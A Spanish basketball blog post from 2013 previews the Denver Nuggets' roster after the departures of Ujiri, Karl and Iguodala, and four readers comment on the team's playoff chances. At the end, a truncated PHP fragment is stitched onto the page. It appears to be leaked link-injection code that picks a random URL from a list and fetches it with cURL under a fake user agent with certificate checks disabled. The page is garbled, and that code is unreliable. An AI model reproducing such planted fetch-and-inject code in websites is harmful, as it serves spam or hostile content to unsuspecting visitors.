Denver Nuggets: Espectáculo garantizado

12 de October de 2013 por Simon

Complicado analizar y prever que va a pasar este año con los Denver Nuggets. Mucho revuelo han causado y muchas críticas han caído sobre los dirigentes de Denver y es que a priori es complicado justificar la dirección que ha tomado este verano tras dejar escapar a tres de sus “piezas claves”. El primero fue el General Manager y actual ganador del premio de mejor ejecutivo del año en la NBA, Masai Ujiri. El siguiente damnificado fue George Karl también nombrado recientemente como entrenador del año y que había sido el entrenador principal de la franquicia durante nueve temporadas en las cuales Denver alcanzó los Play Off en todas ellas.  Para terminar, el alero AllStar André Iguodala hacía las maletas viendo el panorama y decidía no renovar por la franquicia de Colorado.

Siendo fríos y atendiendo a los simples números, lo cierto y la verdad es que la oferta de los Raptors a Ujiri era inigualable, fuera de mercado. George Karl era un entrenador que caía bien a todo el mundo y que conseguía un buen puñado de victorias en la regular pero que a la hora de la verdad sólo una vez fue capaz de avanzar rondas en PO. Su gestión de la plantilla en temporada regular era inmejorable pero una vez llegados a Play Off carecía de plan B y cualquier equipo sacaba sus vergüenzas a relucir cuando había que jugarse las castañas. En cuanto a André Iguodala encontramos pocas razones para no renovarlo, salvo la meramente económica y la posibilidad de que simplemente Iggy no quisiera seguir jugando en Denver y quisiera irse a un equipo con verdaderas aspiraciones.  

Centrándonos en lo que es la plantilla y su configuración hay que empezar por quienes han sido y serán los encargados de llevar esta nave a cotas mayores que sus predecesores. Como General Manager se ha contratado a Tim Connelly, del que yo personalmente nunca había oído hablar. Es una apuesta por un GM joven y barato que esperan que se destape en Denver como hizo Masai Ujiri. Lo que realmente me gusta de Denver es que por fin alguien ha apostado por Brian Shaw como entrenador jefe. El alumno más aventajado del maestro Zen por fin será el entrenador principal de una franquicia NBA tras sonar para todos los banquillos disponibles cada año y quedarsse siempre a punto de conseguirlo.  ¿Veremos una especie de triangulo ofensivo en Denver Nuggets? Por nuestro bien y por la mística de ese sistema esperemos que no… Sólo imaginarme a Kenneth Faried o JaVale McGee repartiendo juego desde el poste me da urticaria. Aunque pensándolo bien… los conceptos McGee y “repartir juego” sí que suenan interesantes para una película de humor.

Pocas novedades en el puesto de point guard. El base titular será un año más el menudo y eléctrico Ty Lawson. Este año deberá convertirse en la referencia ofensiva definitiva del equipo, sobre todo ahora que Gallinari se perderá un buen tramo de la competición. El año pasado le costó coger ritmo y confianza pero su temporada fue realmente buena. Este año tendrá que dar un saltito más en su rendimiento si quiere meter a Denver en Play Off. Su suplente será el de siempre, el eterno André Miller, el mejor base suplente de largo de la competición que en la práctica ejerce muchas veces de titular y capitán del barco. Siempre que está en cancha suceden cosas. Es capaz de asistir y definir y no le tiembla el pulso a la hora de jugársela. Haríamos bien en disfrutar del bueno de André puesto que no debe quedarle mucho tiempo y sinceramente me gustaría verlo en algún equipo con opciones de anillo antes de que le llegue el declive.  En la posición de base también verá minutos Nate Robinson, el cual estoy seguro de que rendirá en los minutos de que disponga y nos hará vibrar con sus diabluras. De todas maneras, no creo que su perfil fuera el más indicado para los Nuggets, más que nada porque es una “copia” del estilo de Ty Lawson pero sin los galones de este y aún más pequeño, que ya es decir.

Las alas se han quedado un poco cojas tras la marcha de Iguodala y la lesión de Gallinari. No sé muy bien en quien está  pensando Shaw para el puesto de escolta pero de primeras tiene a Randy Foye y Evan Fournier como escoltas puros. Ninguno de los dos es un jugador fiable pero serán los que disputen más minutos en ese puesto. Fournier dispuso de pocos minutos el año pasado pero en los pocos que jugó dejó  muchos detalles de calidad que deberá refrendar este año. Foye aportará tiro exterior, que era una de las grandes deficiencias de Denver en los últimos años. La poca fiabilidad que ofrecen estos jugadores me hace pensar en la posibilidad de ver muchos muchos minutos a dos bases juntos.

El alero titular sin Gallinari será Wilson Chandler, un sólido jugador capaz de hacer un poco de todo y todo bien.  Es capaz de cubrir tres posiciones en la cancha dada su gran versatilidad. Lo veremos de escolta, de alero e incluso a ratos de ala-pívot.  Sus suplentes serán Jordan Hamilton y Quincy Miller dos jugadores que de momento, apenas son jugadores de rol y muy limitados. Ojo que si los escoltas no están finos, Hamilton es otro que podría jugar en esas posición. Quincy Miller es un jugador al que me gustaría ver con minutos y confianza puesto que un jugador de su estatura, manejo e inteligencia tiene que tener un hueco en esta liga. La grave lesión de Danilo Gallinari podría hacerle perder toda la temporada, por lo que su impacto en el equipo este año apenas va a ser testimonial aunque si se recupera a tiempo y Denver está luchando por Play Off supondría un gran refuerzo.

El titular en el puesto de ala-pívot será Kenneth Faried. Escaso de calidad pero intenso y físico como el sólo.  Sus suplentes serán Anthony Randolph y Darrell Arthur, ambos tratando de encontrar su sitio en la liga todavía. Anthony Randolph es un ala-pívot sumamente versátil  y atlético pero que no termina de ser consistente y explotar. El año pasado con Karl su aportación fue anecdótica, veremos que saca Shaw de él. Darrell Arthur apuntaba a suplente interior de lujo hace un par de años en Memphis pero una lesión truncó su ascenso y desde entonces no ha vuelto a ser el mismo. Aportará algo de defensa, lo que no viene mal a Denver, intensidad y sobretodo un perfil de interno distinto al resto.

El center titular será un ala-pívot que se pasó la temporada pasada jugando de center y rindiendo a un gran nivel, JJ Hickson, otro jugador muy fuerte y atlético (cómo no…). En Cleveland y Sacramento defraudó pero en Portland su papel fue muy destacado. Veremos a ver si sin los espacios que crea Lamarcus Aldridge es capaz de sobrevivir. Su suplente será el díscolo y entrañable JaVale McGee en el que cada vez confiamos menos para que sea la verdadera referencia interior que buscaban los Nuggets y que muchos pensábamos que podía llegar a ser si se centraba. Cómo hay cosas que parece que son inamovibles pues parece que McGee y su cabecita no dan para más y nos seguiremos deleitando con cosas como estas… A McGee hay que quererlo porque sí. Timofey Mozgov cubrirá los minutos de la basura aportando su defensa y tamaño que tan poco se valoran en Denver. Un cambio de aires le vendría de perlas.

Está claro que Denver es un equipo peor que el año pasado pero al menos han cambiado algo. El recorrido de George Karl en Colorado estaba ya más que agotado. Denver se encuentra en una tesitura ya que tiene  un buen equipo pero probablementeya no les dé para meterse en Play Off como años anteriores. No descarten varios traspasos antes del cierre del mercado o en verano pero parece que los Nuggets tendrán que moverse pues este proyecto tiene el techo muy bajo.

Quinteto inicial: Ty Lawson, Evan Fournier/Randy Foye, Wilson Chandler, Kenneth Faried, JJ Hickson.
Sexto hombre: André Miller

Pronóstico: Victoria arriba/victoria abajo estarán más o menos en el 50% pero fuera de los Play Off. Seguirán siendo de los mejores equipos de la liga en casa.

Comenta

4 comentarios a esta entrada

  1. Denise dice:
    #1

    Yo tambien los veo fuera de Playoffs.
    La pintura en defensa puede ser de lo mejorcito de la liga, pero en ataque no hay un jugador en condiciones para meterle la bola dentro, que anote con fluidez ó que saque la bola afuera para que los exteriores ametrallen el aro.
    Y hablando de exteriores, las alas son de lo peorcito de la liga, tanto que no me extrañaría que jugasen mucho tiempo con 2 bases más Gallinari.
    Ya que no cuentan con Mozgov, que a mi siempre me ha parecido el ruso un jugador muy util y aprovechable, deberían traspasarlo a cambio de algun exterior más, que es facil hacerlo porque siemrpre hay equipos con ganas de hacerse con centimetros y apuntalar la pintura.

      Citar

  2. Ruxixón dice:
    #2

    Creía que no pero veo que la sensación respecto a los Nuggets está más próxima al fracaso.A mí me da que después de tanto tiempo esperando la oportunidad de Shaw,Denver va a ser el “flop” de la temporada.

    De momento en la pretemporada está hablando muy bien de Quincy Miller,que es una especie de Kevin Durant cuando éste llegó a la liga -supongo que en lo que respecta al físico-,no sé si tendrá intención de darle muchos minutos en la RS pues sobre el papel los aleros deben ser Gallinari/Chandler.Está dando bola a McGee con Hickson de 6º hombre pero me deja dudas Faried.Todos sabemos sus características de juego pero necesita mejorar y no quedarse en esa versión de “Manimal”.Teniendo en cuenta que Shaw siempre tuvo en su equipo a 4’s más de toque(Gasol y West principalmente) que de garra vamos a ver.

    Yo los veo fuera de PO al igual que vosotros,aunque luchando por esas últimas plazas que se van a jugar los Blazers,Timberwolves…y en situaciones puntuales quizás se metan (lesiones?¿) apostando a que jugarán,por las características de los jugadores,a un ritmo muy rápido.

      Citar

  3. rumbero dice:
    #3

    Pues yo me la juego y si les voy a dar PO . Si hay un equipo que ha sabido sobrevivir especialmente bien estos últimos años a los traspasos o huídas de sus mejores jugadores estos son los Nuggets. Para mi siguen teniendo un gran bloque. La batería de interiores es inagotable para jugar a un ritmo alto como les gusta y con muchísimas alternativas. Si es cierto que en cuanto anotación exterior van algo más justos, pero ya les pasaba con Iggy. Mientras no vuelva Gallinari mucha responsabilidad para Lawson y Chandler, y a partir de aquí lo que puedan aportar tios como Robinson, Fournier o inlcuso Jordan Hamilton bienvenido será. Con lo que van a ganar en casa y la confianza que le tengo a a Shaw yo creo que van a ser un equipo muy muy peleón.

      Citar

  4. Sancho88 dice:
    #4

    Hickson no decepcionó en Cleveland, aunque sí en Sacramento. Como comentáis, juego interior muy similar donde no hay un jugador que destaque especialmente por su inteligencia, sino más bien todo lo contrario. Saturación de bases de nivel y un agujero en escoltas/aleros. Este equipo entusiasma muy poquito. Espero verlos fuera de los PO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>